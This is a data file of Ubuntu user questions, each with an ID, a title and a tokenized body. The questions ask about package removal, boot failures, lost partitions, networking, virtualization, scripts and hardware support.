442177	how can i uninstall adobe acroread when nothing else works ?	i have checked all similar questions . none of them offer a working solution in my case . this is not a duplicate . here are the details of my unique situation : $ acroread this causes adobe acrobat reader 9 to open and run . $ lsb_release -a distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise i am running kubuntu $ which acroread /usr/bin/acroread $ ls -la /usr/bin/acroread lrwxrwxrwx 1 root root 31 may 15 2013 /usr/bin/acroread - > /opt/adobe/reader9/bin/acroread /opt/adobe/reader9 $ find . -iname uninstall /opt/adobe/reader9 $ $ sudo apt-get remove acroread package acroread is not installed , so not removed $ dpkg -s acroread package : acroread status : deinstall ok config-files priority : extra section : partner/text installed-size : 65 maintainer : brian thomason < brian.thomason @ canonical.com > architecture : amd64 version : 9.5.5-1precise1 config-version : 9.5.5-1precise1 depends : debconf ( > = 0.5 ) | debconf-2.0 , acroread-bin , nspluginwrapper description : adobe reader adobe reader allows you to view navigate and print pdf files . this version adds advanced forms support ( save ) , better integration with adobe acrobat workflows , customizable toolbars and better overall performance . . this package provides the english version of adobe reader 9. sudo dpkg -- purge acroread dpkg : warning : there 's no installed package matching acroread sudo dpkg -r acroread dpkg : warning : there 's no installed package matching acroread $ sudo locate adobereader ( no results returned ) $ sudo locate acroread /etc/bash_completion.d/acroread.sh /home/me/.kde/share/icons/nitrux-kde/apps/scalable/acroread.svg /var_cache_apt_archives/acroread_9.2-1jaunty1_amd64.deb /opt/adobe/reader9/reader/intellinux/bin/acroread /opt/adobe/reader9/resource/shell/acroread.1.gz /opt/adobe/reader9/resource/shell/acroread_tab /opt/adobe/reader9/bin/acroread /usr/bin/acroread /usr/share/applications/acroread.desktop /usr/share/doc/acroread-bin /usr/share/doc/acroread-bin/changelog.debian.gz /usr/share/doc/acroread-bin/copyright /usr/share/icons/mono/scalable/apps/acroread.svgz /usr/share/icons/oxygen/128x128/apps/acroread.png /usr/share/icons/oxygen/16x16/apps/acroread.png /usr/share/icons/oxygen/22x22/apps/acroread.png /usr/share/icons/oxygen/32x32/apps/acroread.png /usr/share/icons/oxygen/48x48/apps/acroread.png /usr/share/icons/oxygen/64x64/apps/acroread.png /usr/share/lintian/overrides/acroread-bin /usr/share/man/man1/acroread.1.gz /usr/share/scribus/icons/acroread16.png /usr/share/scribus/icons/acroread22.png /usr/share/scribus/icons/acroread32.png /var/cache/apt/archives/acroread-bin_9.5.5-1precise1_i386.deb /var/cache/apt/archives/acroread_9.5.5-1precise1_amd64.deb /var/lib/dpkg/info/acroread-bin.list /var/lib/dpkg/info/acroread-bin.md5sums /var/lib/dpkg/info/acroread.list /var/lib/dpkg/info/acroread.postrm $ sudo apt-get remove -- purge acroread* after running this last command , acroread is still installed and typing acroread at any prompt still causes it to open and run .
442178	will adding wireless firmware have an effect on the other os ?	my dell vostro 1500 laptop has both vista and ubuntu 12.04 lts , and a broadcom wireless 1390 wlan mini-card . i have not been able to get wireless working , but it works fine in vista . i installed the additional broadcom sta wireless driver , but still not able to get wireless . during boot up , a message briefly appears saying that firmware files b43/ucode5.fw and b43-open/ucode5.fw not found . go to http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware and download the correct firmware for this driver version , carefully read all instructions on the website . my question is will adding wireless firmware have an effect on wireless in vista ? ( i was not able to successfully install ndiswrapper using the software center , so i am back to trying to get wireless working with the broadcom sta wireless driver ) .
442179	ubuntu error prevents it from loading	so i have this laptop that i bought for $ 900 , it was a window 8 . i had it for only about 4 months and it crashed ( i should of expected this from a windows ) , so i took the useless hard drive out and got a new one . i bought a solid-state 120gb hard-drive for $ 100 online and figured out that it was a little too big for my computer ( i should have paid attention to the dimensions carefully ) . luckily the hard-drive came with a kit and in it was an external enclosure for it . so i installed linux on it with the new external hard-drive constantly connected to my computer , until one day the hard-drive accidentally got disconnected and nothing happened , my computer was still on and continuing to operate normally , so it obviously has some internal memory ( the memory is not the ram ) . so i continued to use my hard-drive less computer that has only about 10gb of memory , but i do n't install many applications . but today , something different happened , i was playing minecraft ( i am a minecraft nerd ) and then my minecraft crashed saying `` unable to write file to device , out of memory '' , so i started my catch and junk cleaning program and tried to remove some files to free up some space and it cleared up around 200mb and after it was done i started minecraft and got an error saying `` unable to write file to device , out of memory '' , so i just decided to restart my computer and right when i clicked on the settings menu to restart i got a black screen then errors saying `` out of memory '' so i turned off my computer and when i started it back up normally and then it said `` the system is running in low-graphics mode your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself. '' . i do n't understand this because i was just having memory problems and now i am having graphics issues . when i click ok , it goes to a different screen with the following choices : run in low graphics mode for just one session reconfigure graphics troubleshoot the error exit to console login when i click on `` run in low graphics mode for just one session '' it goes to a console screen and then freezes , i can type stuff in but it wont execute the commands , it will just go to the next line . `` reconfigure graphics '' does n't work , it goes to a different screen with `` use default settings '' and `` use your backed-up configuration '' when i click on either one it does nothing but flash a black screen after i click it and return normal again . `` troubleshoot the error '' has several different options 3 of which are just to view the logs and the other choice is `` edit configuration file '' but when i click on it , it does nothing like it did before . `` exit to console login '' does the same as `` run in low graphics mode for just one session '' . i do n't know what to do , its not like i can remove the hard drive and free up some space and fix the errors , i cant even access the start-up options by pressing f12 on start-up because stupid windows disabled that option . would resetting the cmos and inserting a hard drive with linux to fix the error work ? i would think so because it would reset the boot device back to default for booting the hard drive . i do n't know exactly what to do , can you help me ?
442181	a broken wubi has been detected . ubuntu is unable to boot from hard disk	i 've installed ubuntu 12.04.04 alongside my windows xp from usb , but it wo n't boot from hard disk , only from the usb . i suspect that the reason is because i am unable to change bios to boot from dev/sdc since bios only offers the hard disk that corresponds to dev/sda . i have tried running boot repair to no avail . the most recent boot info from this http : //paste.ubuntu.com/7189172/ for this one , i set the boot to go to sda and then point to sdc6 for linux . there is also the following cryptic message from boot repair : a broken wubi has been detected . please fix it this way : https : //wiki.ubuntu.com/wubiguide # cannot_boot_into_ubuntu that url told me to close down windows properly . however i ca n't boot into windows , so that is pointless advice . i also tried telling boot repair to boot into windows from the hard disk , but that made it so i could n't even boot from the usb . i appreciate any help that anyone can give . i do n't know much about linux , but i 'm willing to learn .
442182	backup does n't backup per schedule	12.04 lts backup ( `` deja-dup '' ) is ignoring the schedule i put into it . it only backs up when i do a manual backup . how can i get it to run unattended ?
442183	can not connect to the internet on ubuntu	so i can not connect using my ubuntu os but i can with windows the internet can work with google but as soon as i try any other site it crashes i ran ifconfig and got the following eth0 link encap : ethernet hwaddr 90:2b:34:13:12 : a3 inet addr:130.215.246.212 bcast:130.215.246.255 mask:255.255.255.128 up broadcast running multicast mtu:922 metric:1 rx packets:30 errors:0 dropped:30 overruns:0 frame:30 tx packets:54 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5126 ( 5.1 kb ) tx bytes:9875 ( 9.8 kb ) interrupt:41 base address:0xc000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) ~ $ host google.com google.com has address 74.125.225.0 google.com has address 74.125.225.6 google.com has address 74.125.225.5 google.com has address 74.125.225.7 google.com has address 74.125.225.3 google.com has address 74.125.225.2 google.com has address 74.125.225.14 google.com has address 74.125.225.4 google.com has address 74.125.225.1 google.com has address 74.125.225.8 google.com has address 74.125.225.9 google.com has ipv6 address 2607 : f8b0:4009:806 : :100e google.com mail is handled by 30 alt2.aspmx.l.google.com . google.com mail is handled by 20 alt1.aspmx.l.google.com . google.com mail is handled by 50 alt4.aspmx.l.google.com . google.com mail is handled by 10 aspmx.l.google.com . google.com mail is handled by 40 alt3.aspmx.l.google.com . ~ $ nm-tool networkmanager tool state : connected ( global ) device : eth0 [ wpi-wired ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : wired driver : r8169 state : connected default : yes hw address : 90:2b:34:13:12 : a3 capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : on ipv4 settings : address : 130.215.246.212 prefix : 25 ( 255.255.255.128 ) gateway : 130.215.246.129 dns : 130.215.32.18 dns : 130.215.39.18 dns : 130.215.5.18 then i try to run something and get ~ $ host google.com ; ; connection timed out ; no servers could be reached any help would be very much appreciated
442187	how to find my possibly lost partition ?	i could n't open my computer using windows 7 operating system and i did n't have my files backed up , so i opened it using ubuntu , stored in a usb stick , without installing . i ( a friend of mine , i am just a noob ) created a partition that used to contain all my files , with the name `` 161 gb volume '' ( my hd capacity is 1tb ) . once i accidentally started the installation of ubuntu , but not in the `` 161.. `` area . when i realised it , i just pulled the usb stick out of the pc ( yes , this was a reeeeally bad option ) . now i can still open ubuntu as before , but i ca n't see my files . plus , i can find the gparted partition editor , but can not open it ( it crashes or so ) . i tried to find my files again using this access windows files in ubuntu guide , but all i got was a message that it was exclusively opened by another device or system or that it was already mounted . typing the command sudo fdisk -l on the terminal , i can see these : device boot start end blocks id system /dev/sda1 * 2048 314574847 157286400 7 hpfs/ntfs/exfat /dev/sda2 1942253568 1953517567 5632000 27 hidden ntfs winre /dev/sda3 314574848 1942253567 813839360 83 linux partition table entries are not in disk order disk /dev/sdb : 2013 mb , 2013265920 bytes device boot start end blocks id system /dev/sdb1 * 32 3932159 1966064 b w95 fat32 is there anything that i can do to see my files ?
442188	ubuntu gnome / nvidia - triple monitor possible ?	using default graphics it works fine without acceleration . installed nvidia-current and the second card wo n't run . if i enable gpu-1 ( 210 ) , even if gpu-0 ( 260 ) is still enabled it wo n't run and i go back to one monitor at 800x600 . i see there are hundreds of similar questions , but they cover everything from bumblebee to unity/compiz . have n't yet found anything applicable , advanced newbie when it comes to linux . ubuntu gnome , i5 3570k desktop , nvidia gtx 260 & gtx 210 . 260 drives two 21.5 '' monitors at 1920x1080 , 210 drives an old 17 '' monitor at 1024x768 .
442191	recovering openoffice files from corrupted os	i tried to upgrade to ubuntu 13.10 yesterday , and my laptop promptly froze and would n't respond to anything other than the power button . when i turned it back on , ubuntu failed to work period . i can get control of the mouse , but it 's just a blank screen , nothing to click on , no keyboard commands are working . now , i 'm not too worried about this -- a reinstall will probably fix that . the issue is that i have a brace of about twenty openoffice files that would make my boss very grumpy if i lost . is there any way to recover them ? i 've made a boot disk using a usb drive , but even when i boot from the flash drive , i ca n't see the files that need rescuing . is there some way to recover them ? please explain it in simple language for an inexperienced linux user .
442195	which of the filesystems supported by ubuntu is the most resistant to file corruption ?	i want to ask wich file system is the most damage and file corruption resistant . i mean the most secure for my data preventing data loss and such in case of a blackout or power failure . for example : i want my data to be safe if someone disconnects my ubuntu machine from the power outlet by accident .
442197	create browse-files button in quickly app	how can i set the `` add button '' i have created using quickly application developer to pop up a regular `` browse to open files '' window whenever it is clicked ? i also want to display the selected image at the display area below the button named imagearea . if someone could help me with that . self.addbutton = self.builder.get_object ( `` addbutton '' ) def on_addbutton_clicked ( self , widget ) : ( take me to browse an image ) ( display the selected image )
442200	help ! strange netstat connections , wireshark shows redirects , think im infected	today my ubuntu 12.04 pc crashed and i had to force kill it , which it never does . then after booting back up i ran wireshark and saw random dns requests and a protocol i 've never seen before 'dec dna ' as well a lot of weird udp streams . i ran netstat -la and this was the output : root @ linuxbox : ~ # netstat -la active internet connections ( servers and established ) proto recv-q send-q local address foreign address state tcp 0 0 localhost : domain * : * listen tcp 0 0 * : ssh * : * listen tcp 0 0 localhost : ipp * : * listen tcp 0 0 localhost : mysql * : * listen tcp 0 0 * : http * : * listen tcp6 0 0 [ : : ] : ssh [ : : ] : * listen tcp6 0 0 ip6-localhost : ipp [ : : ] : * listen udp 0 0 *:1900 * : * udp 0 0 *:40322 * : * udp 0 0 localhost : domain * : * udp 0 0 localhost : ntp * : * udp 0 0 * : ntp * : * udp 0 0 * : mdns * : * udp6 0 0 fe80 : :7879 : ff : fe00 : :ntp [ : : ] : * udp6 0 0 fe80 : :12fe : edff : fe2 : ntp [ : : ] : * udp6 0 0 fe80 : :216:6fff : fe4d : ntp [ : : ] : * udp6 0 0 ip6-localhost : ntp [ : : ] : * udp6 0 0 [ : : ] : ntp [ : : ] : * udp6 0 0 [ : : ] :47318 [ : : ] : * udp6 0 0 [ : : ] : mdns [ : : ] : * active unix domain sockets ( servers and established ) proto refcnt flags type state i-node path unix 2 [ acc ] stream listening 11019 /tmp/.x11-unix/x0 unix 2 [ acc ] stream listening 11618 /tmp/.winbindd/pipe unix 2 [ acc ] stream listening 13721 /tmp/keyring-hynzdz/control unix 2 [ acc ] stream listening 13860 /tmp/ssh-colalkgr2295/agent.2295 unix 2 [ acc ] stream listening 13890 /tmp/.ice-unix/2295 unix 2 [ acc ] stream listening 14080 /tmp/keyring-hynzdz/pkcs11 unix 2 [ acc ] stream listening 14084 /tmp/keyring-hynzdz/ssh unix 2 [ acc ] stream listening 14085 /tmp/keyring-hynzdz/gpg unix 2 [ acc ] stream listening 10790 /var/run/acpid.socket unix 2 [ acc ] seqpacket listening 7973 /run/udev/control unix 19 [ ] dgram 10025 /dev/log unix 2 [ acc ] stream listening 7850 @ /com/ubuntu/mountall ... and many , many more i cant fit here . ... can anyone tell me what those odd listening services are ? i had a web server on my home lan and just today moved it to a vps for security reasons . i had noticed strange things going on with the network before week , but this seems abnormal . i 've just never seen this before . can someone help me ? rkhunter does not seem to find anything . i logged into my openvpn , ran wireshark again and noticed ssh connections from random ips . i ran 'who ' and nobody else was here . but then wireshark started displaying tcp redirect of my openvpn traffic , repeatedly until i killed the connection . i should note that this is also now happening on my other ubuntu computer , which is on the same network . i no longer require assistance with this . a little more digging has informed me that these are normal services , and that the output of ls -la and ls -a are not the same thing ... i have not slept in two days , so forgive my ignorance .
442202	how to use setvcpus from libvirt command line ?	i 'm using libvirt with kvm/qemu . i found a great ppa , uvtool ( http : //s3hh.wordpress.com/2013/12/12/quickly-run-ubuntu-cloud-images-locally-using-uvtool/ ) , that manages images and metadata in a volume storage pool . i can quickly create new vm guests from the command line . this makes it easy to work with shell scripts to create/destroy using uvt-kvm ( uvtool 's wrapper ) and start/stop using virsh ( from libvirt package ) . for some reason , guests have only one cpu/core and i need to set the number from the command line . i found references to virsh 's setvcpu option , but no examples of how to use it . here 's what i tried with the error messages : start existing guest with 2 cpu 's : tahoar @ pttools0 : ~ $ virsh start test-host setvcpus -- count 2 error : command 'start ' does n't support option -- count start existing guest with defaults : tahoar @ pttools0 : ~ $ virsh start test-host domain test-host started set cpu 's on running guest : tahoar @ pttools0 : ~ $ virsh setvcpus test-host -- count 2 error : invalid argument : requested vcpus is greater than max allowable vcpus for the domain : 2 > 1 thanks for any help .
442203	error while upgrading 12.04 lts to 12.10	while upgrading ubuntu via update manager , i 'm getting this following error . after this error system is reverted back to it 's original version . w : failed to fetch http : //archive.canonical.com/dists/ [ distro ] /partner/source/sources 404 not found [ ip : 91.189.92.191 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . my sources.list # deb cdrom : [ ubuntu 12.04.3 lts precise pangolin - release amd64 ( 20130820.1 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04.3 lts precise pangolin - release amd64 ( 20130820.1 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04.3 lts precise pangolin - release amd64 ( 20130820.1 ) ] / precise main restricted # see help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //in.archive.ubuntu.com/ubuntu quantal main restricted deb-src http : //in.archive.ubuntu.com/ubuntu quantal main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //in.archive.ubuntu.com/ubuntu quantal-updates main restricted deb-src http : //in.archive.ubuntu.com/ubuntu quantal-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //in.archive.ubuntu.com/ubuntu quantal universe deb-src http : //in.archive.ubuntu.com/ubuntu quantal universe deb http : //in.archive.ubuntu.com/ubuntu quantal-updates universe deb-src http : //in.archive.ubuntu.com/ubuntu quantal-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //in.archive.ubuntu.com/ubuntu quantal multiverse deb-src http : //in.archive.ubuntu.com/ubuntu quantal multiverse deb http : //in.archive.ubuntu.com/ubuntu quantal-updates multiverse deb-src http : //in.archive.ubuntu.com/ubuntu quantal-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review
442206	enable username box ubuntu 13.10	i 'm using 13.10 -- how can i make it so that at login , it 's just a blank box ? so it 'll say `` enter your username : '' then `` now , enter your password : '' i tried once before but did n't seem to work on 13.10 . forgot how . how can i ?
442211	unable to change permissions on a mounted fs ( from nas )	here is the problem : i mount a nas directory via smb in /mnt using the following command : mount -t smbfs -o username=username , password=password //win-box/share /mnt/name-of-mountpoint where : win-box is the ip address of the nas share is the actual share name name-of-mountpoint is a name of a directory i previously created by `` sudo mkdir /mnt/name-of-mountpoint '' the result is : laurent06000 @ pc-de-ldp : /mnt $ ls -al total 12 drwxr-xr-x 7 root root 4096 mars 31 18:43 . drwxr-xr-x 27 root root 4096 mars 15 06:23 .. drwxrwxrwx 20 root root 0 avril 1 22:15 diskstation drwxr-xr-x 2 root root 4096 mars 30 20:37 passport drwxr-xr-x 2 root root 0 mars 11 08:57 wdmycloud drwxr-xr-x 2 root root 0 mars 30 22:54 wdmycloud2 drwxr-xr-x 2 root root 0 mars 30 09:42 wdmycloud3 i can `` ls '' each of those directories , but a chmod or chown on those is ineffective . my final purpose is to use freefilesync to make automatic backups . thanks in advance for your help . laurent ps : here is the result of the sudo blkid -c /dev/null command ( but the partition does not appear there ) : [ sudo ] password for laurent06000 : /dev/sda1 : uuid= '' 1060d3f6-02f1-4b89-829c-fed126ffc431 '' type= '' ext4 '' /dev/sdb1 : uuid= '' d6f5fb7c-3f8a-4417-b26a-356efe5badbc '' type= '' ext4 '' /dev/sdb5 : uuid= '' 7ba6d2d8-4439-4fd4-bd7e-e217c5e6d9fd '' type= '' swap '' /dev/sdc1 : label= '' rm-cm- ) servm-cm- ) au systm-cm- ( me '' uuid= '' fe8cd2408cd1f35f '' type= '' ntfs '' /dev/sdc5 : uuid= '' 0cc3d633-b99e-4578-a54e-687afd200226 '' type= '' ext4 '' /dev/sdd1 : uuid= '' 705c48fd-e126-4af4-baea-f7692de7f138 '' type= '' ext4 '' /dev/sde1 : label= '' my passport '' uuid= '' f474b7aa74b76dcc '' type= '' ntfs '' /dev/sdg1 : label= '' large '' uuid= '' 2a783e85783e5035 '' type= '' ntfs '' /dev/sdh1 : label= '' elements '' uuid= '' 7ed8f451d8f40963 '' type= '' ntfs '' /dev/sdm1 : label= '' nouveau nom '' uuid= '' 486e3de36e3dca88 '' type= '' ntfs '' found this but inappropriate
442212	asus g60 vx laptop with oridginal hd with 7 and add an sdd with ubuntu 12.04lts to keep separate	i dual booted 13.10 to a partition on an asus g60vx and it worked great for a a month . it then crashed and i could n't even get to bios . with help i got back 7 with dvd and mirror . laptop has space for a second hard drive . i have a new 5400 320gb but thought i should try ssd 128gb to install ubuntu 12.04lts this time . can i keep them separate ? i was going to remove the 720 320gb 7 hd install new ssd or hd in the extra space install ubuntu and put the 7 hd back in ? is there a good or safe way to switch between the two ?
442216	nohup cancelling every x hours	i 'm running a script and every x amount of hours it decides to randomly stop working . any ideas ? the script is : # ! /bin/bash while true do php -q /var/www/pv/cronjobs/limiters.php sleep 10 done
442217	how can i change startup applications in lubuntu	i installed xscreensaver in lubuntu 13.10 and it wont start up auto . neither will my power manager ( using a laptop ) i do not see `` startup apps '' anywhere
442218	mac mini , upgraded from 12.04 to 12.10.. got purple screen	after updating from 12.04 to 12.10 on converted mac mini , i clicked restart as requested . reboot stayed on purple screen with the dots and never loaded . i was able to get into grub but i do not know what to do next or how to see what is the issue . any suggestions ?
442220	how do i install windows 8.1 ?	i am currently running ubuntu 12.04 and would like to install windows 8.1 . i have attempted using multiple programs from the software center but nothing seems to open and run the windowssetupbox.exe file . how would i go about installing windows ?
442223	trouble in detecting usb drive ( pendrive 2.0 )	i just bought a new pendrive of 8gb storage . it is detected in windows but not in the ubuntu , but the light in the pendrive still keeps flashing , so i think the pendrive is ok .
442224	13.10 , second monitor : how do i make the `` display : hdmi1 '' box go away ?	i 've got a new laptop on which i 've installed 13.10 and i use xfce as my desktop . i want to use the laptop with an external monitor , and that works fine , mostly . however , when i use the `` display '' settings control to select the screen to use , the blue box that shows up to tell me that my external monitor is `` hdmi1 '' does not go away after i 've set things up . here 's what it looks like : it wo n't go away . i 've dismissed the `` display '' settings application , but the thing is still there . what is going on ? overall the xfce display chooser seems to work much , much worse in 13.10 than in 13.04 . it 's a crapshoot whether it can re-enable the laptop display or not . i can do it reliably with xrandr , so i do n't think it 's a low-level problem . edit if i turn the external monitor off with xrandr and then back on , the stupid thing comes back .
442227	avidemux how to resize viedos with the h.263 codec ?	i want to use the h.263 codec for my videos with avidemux but everytime i want to render the video from .webm to .mp4 with this codec i get an error message that this format is not supported and the only formats it accepts are for example : 704 x 576 . but when i try to find my solution in the internet many people say h.264 is the best codec . my problem now is that i have a 1600x900 video and want to render it with h.264 to .mp4 without resizing it . does anybody know an answer ?
442231	trying to remove windows xp os without dvd drive nor usb booting ability	i have an old laptop ( hp dv4000 ) with dual booting ( ubuntu 12.04 and windows xp ) . i would like to get ride of the windows os but my problem is that all the tutorials i saw , are requiring to boot from a burned dvd or from a usb flash ( to then install the `` os-uninstaller '' ) . my internal dvd drive is not working , and i use an external dvd drive . but my laptop model does n't allow to boot from an external source ( dvd drive or usb flash ) . i checked the laptop bios and the forums on hp , and it 's a known limitation . is there any way to install the `` os-uninstaller '' straight into the hard disc and run it from there ? thanks !
442241	running game server from bash without waiting for input	i have a simple script which takes commands to start , stop , restart and return the status of a game server ( sa : mp ) . the site provides the solution for using this command : ./samp03svr & which works all well and dandy however when the script executes this it holds and waits for user input ( pressing enter ) which then continues script execution . i ca n't seem to find a way to keep the scripts execution without waiting for any user input . i 've been searching for about 5 hours now and have tried at least 20 different things including running screen . running screen worked just does n't provide the exact thing i am looking for . the script also collects the process id immediately after like so : mv ./server_log.txt ./logs/server_ $ now.txt mv ./mysql_log.txt ./logs/mysql_ $ now.txt ./samp03svr < < < echo & pid= $ ! echo $ pid > $ pidf echo -e `` the server has been started successfully '' the message that comes up waiting for return is : started server on port : 7777 , with maxplayers : 30 lanmode is off . the server is running 64-bit ubuntu 12.04 . thanks in advance .
442246	how to run an application on startup automatically ?	i am using `` ubuntuserver13.10 '' and i have dynamic ip . so for learning purpose , i want to add a host on my dynamic ip to open my server easily from anywhere . for this purpose , i used www.noip.com script . everything is working fine and its changing my dynamic ip to there host automatically whenever my dynamic ip got change . now the problem is that for this purpose , i have to start the `` no-ip '' application on every boot manually that i do n't want . i am using /usr/local/bin/noip2 in terminal to start manually after starting server . so my main question is that how to start this application on server startup/boot automatically ? waiting for perfect and easy solution ... i have the below script provided by `` no-ip '' support dept . is this ok and where to add this ... # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ! /bin/sh # . /etc/rc.d/init.d/functions # uncomment/modify for your killproc case `` $ 1 '' in start ) echo `` starting noip2 . '' /usr/local/bin/noip2 ; ; stop ) echo -n `` shutting down noip2 . '' killproc -term /usr/local/bin/noip2 ; ; * ) echo `` usage : $ 0 { start|stop } '' exit 1 esac exit 0 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
442249	laptop resume with external display : all windows are displaced to other workspaces , why ?	i am not sure if this is the default behavior and if someone else noticed it . suppose i have 4 workspaces with an external display plugged in so my workspace setup looks like this : [ w1a w1b ] [ w2a w2b ] [ w4a w4b ] [ w4a w4b ] w1-w4 are the workspaces , broken into a ( external display ) and b ( internal display ) . now i open windows in w1a → window 1 w4a → window 2 w4b → window 3 if i suspend now and resume afterwards , the windows are displaced to other workspaces ( not always the same ) . mostly it 's like : window 1 → w1b window 2 → w4b window 3 → w4b how can i make them stay where they are before suspend ?
442252	how do i setup an ip to return host unreachable for testing on travis-ci.org ?	i am adding tests to the ruby net-ping library and am trying to setup a test ip # that returns host unreachable icmp packets . i am using travis-ci.org and my local host for testing . on my local machine i can discover a missing ip # using https : //github.com/ianheggie/net-ping/blob/fix_icmp_enetunreach_bug/test/find_unreachable_host.bash , but travis-ci.org does n't have an eth0 adapter : $ netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 192.0.2.1 - 255.255.255.255 ! h - - - - 0.0.0.0 0.0.0.0 0.0.0.0 u 0 0 0 venet0 note : 192.0.2.1 is the ip # i setup for route unreachable using https : //github.com/ianheggie/net-ping/blob/fix_icmp_enetunreach_bug/test/setup_ubuntu.bash ( which does work ) . i tried # ! /bin/bash if ping -n -c2 192.0.2.2 2 > & 1 | egrep -i host . *unreachable then echo unreachable network is already setup else sudo iptables -i output -d 192.0.2.2 -j reject -- reject-with=icmp-host-unreachable fi which makes the ping command itself happy , but ruby discovers the local rules and returns an eperm result when trying to send an icmp packet - which is not the case when i do the same test to an unallocated ip # from my local eth0 range . i am able to create an ip # that returns unreachable route , but not unreachable host . from what i can see the travis vm 's are setup with venet0 being the gateway to everything . as a side point - i am unsure if host unreachable only applies in local networks ( eg ethernet when arp lookup fails ) or if it is returned when the ip # is not on your local network . any comments ?
442253	accidentally deleted partitions	i am having some trouble with my laptop . i had win 7 64 bit preinstalled on laptop and recently installed ubuntu 12.04 lts . i was trying to find what could be the worst case for my laptop..i opened win 7 and went to disk management where i deleted the volume where ubuntu was installed.. when after restarting it showed no grub file found ( the multi boot file ) , i took my pen drive and opened ubuntu from it as a trial.. now there i deleted the space utilized by win 7 ( i.e . c drive ) . i did not deleted it completely . i kept some files there . i did n't touch the system reserve file.. now i restarted the laptop.. it does n't go ahead because it has no `` complete os boot option '' haha.. i have found that creepy situation.. i now want to format all partitions from my hard drive and start it as a fresh one.. for that i want to enter the command prompt that comes after booting from win7 cd and then enter debug commands for formatting hard drive . what should be the commands ?
442256	ubuntu on amd or intel , does it makes a difference ?	i have both ubuntu os on a 1 . intel core i3 quad-core cpu cpu mhz : 1800 bogomips : 4390.30 2 . amd quad-core cpu cpu mhz : 1900 bogomips : 8040.2 from the cpu specs the amd looks to have the advantage . however when compiling java application ( same for both ) , even at peak usage , in the intel cpu computer , i can still use ubuntu well , however in the amd cpu , ubuntu freezes and the mouse can not even move . what is happening in this case ?
442258	how to add serial port in vm to connect to physical network	i have created vm in ubuntu server host.this vm in-turn has ubuntu operating system installed on it.now i want to connect this vm to a physical serial port of a device . my issue is : - how can i create a virtual serial port in this vm and then network the other end to the physical serial port of device . help please ! ! ! !
442259	how do i deploy a django or php website via juju ?	this question may be a bit basic , but i have read the documentation here https : //juju.ubuntu.com/docs/ i understand how i deploy the charms ( apps ) to a service . but if i want to deploy a django app or php website to my services how do i do this on juju ?
442261	install python setup tools for ubuntu 12.04	i am trying to install savanna in openstack but i am getting this error that i have posted on askubuntu.com someone told me that it might happen because i have not right version of python-setup-tools installed for my ubuntu . i installed python using this command . sudo apt-get install python-setuptools python-virtualenv python-dev can anyone tell me what is the right version and command to install python-setuptools ?
442263	thin server not working on production mode ( live ) on amazon ec2	i am new to ubuntu and i have put my rails code on amazon ec2 machine.. i am having issues that the thin server i have put on the server seems to crash.i have put this question on stackoverflow forum , but did not get any help . the following is the link : - http : //stackoverflow.com/questions/21699331/thin-server-not-working-on-production-modelive-on-amazon-ec2 i dont know what is happening and why this is taking place . please help me with this .
442264	unable to install lotus notes 8.5.3	mallikarjun @ 1w11 : ~/documents/msj/sysadmin/ln853/lotus_notes853_linuxub_en $ sudo dpkg -i ibm-lotus-notes-8.5.3.i586.deb [ sudo ] password for mallikarjun : dpkg : regarding ibm-lotus-notes-8.5.3.i586.deb containing ibm-lotus-notes , pre-dependency problem : ibm-lotus-notes pre-depends on libgnomeprint2.2-0 dpkg : error processing ibm-lotus-notes-8.5.3.i586.deb ( -- install ) : pre-dependency problem - not installing ibm-lotus-notes errors were encountered while processing : ibm-lotus-notes-8.5.3.i586.deb
442267	data storage on ubuntu aws	my client needs 500 gb data space on cloud ( aws ) . i had created a ubuntu 12.04 and wonder how do i give my client access to my ubuntu share on aws ? how will my client access it and can they map it as a drive or will be using any client side software to access it ( apart from ftp ) ? or what is the professional way to make this share on server and to give my client access . also they might access from ipads and iphones . any solution please . ps : my clients will be using windows platform .
442269	transparent window title bar	does anybody know how to enable the transparent window title bar in ubuntu 14.04 ? for previous versions ( 13.10 and 13.04 ) you can use this method , but it doesnât work any more in 14.04 . i 'm not referring to the top-panel in ubuntu - i 'm referring to the title-bar of the window .
442271	will my software and soundcards work in ubuntu ?	if i change to linux ubuntu will my old soundblaster soundcard and some of my software that i used with windows xp still work ?
